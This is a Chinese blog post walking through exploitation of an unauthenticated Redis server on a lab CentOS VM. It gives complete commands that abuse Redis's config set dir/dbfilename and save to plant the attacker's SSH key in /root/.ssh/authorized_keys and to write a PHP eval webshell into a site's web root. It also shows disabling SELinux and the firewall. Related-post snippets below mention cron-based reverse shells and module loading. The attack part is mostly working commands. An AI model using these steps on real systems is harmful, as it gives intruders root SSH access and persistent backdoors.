redis-getshell

最新推荐文章于 2024-05-03 23:07:14 发布
最新推荐文章于 2024-05-03 23:07:14 发布
阅读量161 收藏
点赞数
文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60823533/article/details/133269017
版权

一.靶机配置redis环境(Centos)

1. 使用yum安装redis  命令:yum install redis -y

3.修改redis配置文件 路径:/etc/redis.config

bind 127.0.0.1 修改为 bind 0.0.0.0

protected-mode yes修改为 protected-mode no
    
4.修改redis启动文件 路径:/lib/systemd/system/redis.service
将以下参数注释掉:
User=redis                                                                                                                                                                
Group=redis                                                                                                                                                               
RuntimeDirectory=redis                                                                                                                                                    
RuntimeDirectoryMode=0755 
 

5.关闭selinux和防火墙
 

      setenforce 0
 

      systemctl stop firewalld 
 

 

 

6.启动redis连接测试
 

    Systemctl start redis
 

 

二.客户端配置redis环境并测试连接redis(kali)
 

1.安装redis
 

 apt install redis-*
 

 

2.连接redis服务端(centos),出现以下如图表示连接成功
 

 redis-cli -h 192.168.88.128 
 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

三.getshell(ssh公私钥)
 

1.进入 /root/.ssh 目录生成ssh公私钥
 

  cd   /root/.ssh
 

  ssh-keygen -t rsa
 

 

 

2.将生成的公钥(文件id_rsa.pub)复制下来
 

 

1.连接redis
 

 redis-cli -h 192.168.88.128 
 

2.设置目录
 

  config set dir /root/.ssh
 

3.设置文件名
 

  config set dbfilename authorized_keys 
 

4.写入公钥内容
 

  set key “\n\n  公钥内容  \n\n“
 

5.保存并退出
 

  save
 

  quit
 

 

 

6.检查服务端(centos)是否开启ssh密钥登录 路径:/etc/ssh/sshd_config 
 

 PubkeyAuthentication yes  参数取消注释
 

重启ssh服务
 

  systemctl restart sshd  
 

 

7.使用密钥连接ssh,连接成功
 

 ssh -i id_rsa root@192.168.88.128 
 

 

 

  
 

 

四.Getshell(写入webshell)
 

1.服务端(centos)安装web环境,直接一键安装宝塔
 

  if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install_panel.sh;fi;bash install_panel.sh 6dca892c
 

 

2.安装完成,打开bt网站后台,安装环境
 

 

选择安装nginx 和php环境
 

 

3.添加一个站点,记住以下路径 /www/wwwroot/192.168.88.128/
 

 

 

4.使用redis写入webshell
 

 redis-cli -h 192.168.88.128
 

 

 config set dir  /www/wwwroot/192.168.88.128/ (3步骤路径)
 

 

 config set dbfilename shell.php
 

 

 set x "\n\n <?php @eval($_POST['pass’]);?> \n\n"
 

 

save 
 

 
 

 

  
 

 

5.连接wehsell
 

  Shell地址 http://192.168.88.128/shell.php
 


                

        

        

    




    

      

        

            

              
                
                  Y.秃秃
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  2
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell

				
			

			

				

					05-05
				

			

		

		

			
				
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有...

			
		

	



                

              
                



	

		

			

				
					
漏洞复现之Redis未授权访问

				
			

			

				

					m0_56190544的博客
				

				

					09-13
					
					1443
					
				

			

		

		

			
				
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习

			
		

	



                


  
              

                


	

		

			

				
					
SSRF+Redis写入公钥

				
			

			

				

					qq_43665434的博客
				

				

					04-03
					
					3232
					
				

			

		

		

			
				
野径云俱黑,江船火独明。


实验环境




主机
角色
描述




centos8
受害服务器
运行redis数据库(未授权访问)


window10
跳板服务器
含有ssrf漏洞


kali
攻击者
利用ssrf+redis未授权访问写入公钥登录centos8



实验准备
思路:
先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。
条件:
1、redis服务使用root

			
		

	





	

		

			

				
					
Xshell工具利用Redis 6379写入SSH公钥漏洞

					
最新发布

				
			

			

				

					maple_leaf
				

				

					05-03
					
					306
					
				

			

		

		

			
				
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥。

			
		

	



		

			
		



	

		

			

				
					
redis未授权写入ssh公钥登录

				
			

			

				

					m0_46576302的博客
				

				

					09-09
					
					3618
					
				

			

		

		

			
				
利用redis的备份功能,写入ssh公钥

			
		

	





	

		

			

				
					
血的教训---入侵redis并远程控制你的机器场景复现

				
			

			

				

					guijianchouxyz的博客
				

				

					10-26
					
					6834
					
				

			

		

		

			
				
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血

			
		

	





	

		

			

				
					
Redis未授权访问利用

				
			

			

				

					LiuSiXian的博客
				

				

					07-14
					
					595
					
				

			

		

		

			
				
Redis服务器:192.168.100.10攻击机:192.168.15.101。

			
		

	





	

		

			

				
					
第02篇:Redis主从复制getshell1

				
			

			

				

					08-03
				

			

		

		

			
				
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置

			
		

	





	

		

			

				
					
redis-buagent:Redis 远程备份代理

				
			

			

				

					06-08
				

			

		

		

			
				
为什么存在有时您不想在节点本身上运行备份,有时您没有对运行 Redis 的节点的 shell 访问权限。 对于这些情况,创建了此备份代理。如何使用它Go 使这部分变得容易。 假设您设置了 GOPATH 环境变量,您只需运行: go...

			
		

	





	

		

			

				
					
centos源码安装php-8.1.1+phpredis-4.2.0

				
			

			

				

					04-28
				

			

		

		

			
				
sed -i 's/disable_functions =.*/disable_functions = passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,...

			
		

	





	

		

			

				
					
Redis未授权访问配合SSH key文件利用详解

				
			

			

				

					09-09
				

			

		

		

			
				
主要给大家介绍了关于Redis未授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧

			
		

	





	

		

			

				
					
浅谈Linux下的redis攻击

				
			

			

				

					qq_64201116的博客
				

				

					10-17
					
					5210
					
				

			

		

		

			
				
redis服务ip:192.168.65.163 (CentOs)redis服务ip:192.168.65.158 (Ubuntu)kali攻击机:192.168.65.158。

			
		

	





	

		

			

				
					
redis非授权访问漏洞

				
			

			

				

					weixin_43995159的博客
				

				

					11-29
					
					1196
					
				

			

		

		

			
				
复现了三种redis未授权登录的场景。
1.通过redis写入计划任务,取得反弹shell。
2.通过redis写入一句话木马,取得shell。
3.通过redis写入ssh公钥,实现ssh无密码连接。

			
		

	





	

		

			

				
					
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限

				
			

			

				

					weixin_36156325的博客
				

				

					08-02
					
					2587
					
				

			

		

		

			
				
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...

			
		

	





	

		

			

				
					
Redis 未授权访问

				
			

			

				

					Fengxin的博客
				

				

					12-02
					
					3502
					
				

			

		

		

			
				
0x00 前言 学习目标
1.redis特点及安装
2.redis键值操作
3.redis数据类型【String,link,set,order set,hash】
0x01 redis是什么
Redis is an open source, BSD licensed, advanced key-value store. It is often referred to as a data structure server since keys can contain strings, hashes, list

			
		

	





	

		

			

				
					
记录一次Redis未授权getshell几种常见方法

				
			

			

				

					qq_45888826的博客
				

				

					09-17
					
					3765
					
				

			

		

		

			
				
记录一次Redis未授权getshell几种常见方法

			
		

	





	

		

			

				
					
kali 安装 Redis 及 配置可远程访问

				
			

			

				

					Hack_Different的博客
				

				

					09-22
					
					4811
					
				

			

		

		

			
				
一、在线下载


# wget http://download.redis.io/releases/redis-4.0.11.tar.gz

二、安装


# 1.解压
# tar -zxvf redis-4.0.11.tar.gz

# 2.编译
# cd redis-4.0.11 # 切换
# make            # 编译


# 如果出现gcc错误

# 1.安装gcc
# ap...

			
		

	





	

		

			

				
					
redis-cli 添加用户命令

				
			

			

				

					12-16
				

			

		

		

			
				
redis-cli get key ```  其中,key是键名。  4. 删除键值对  ```shell redis-cli del key ```  其中,key是键名。  5. 查看所有键  ```shell redis-cli keys * ```  6. 查看键的类型  ```shell redis-cli type key `...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值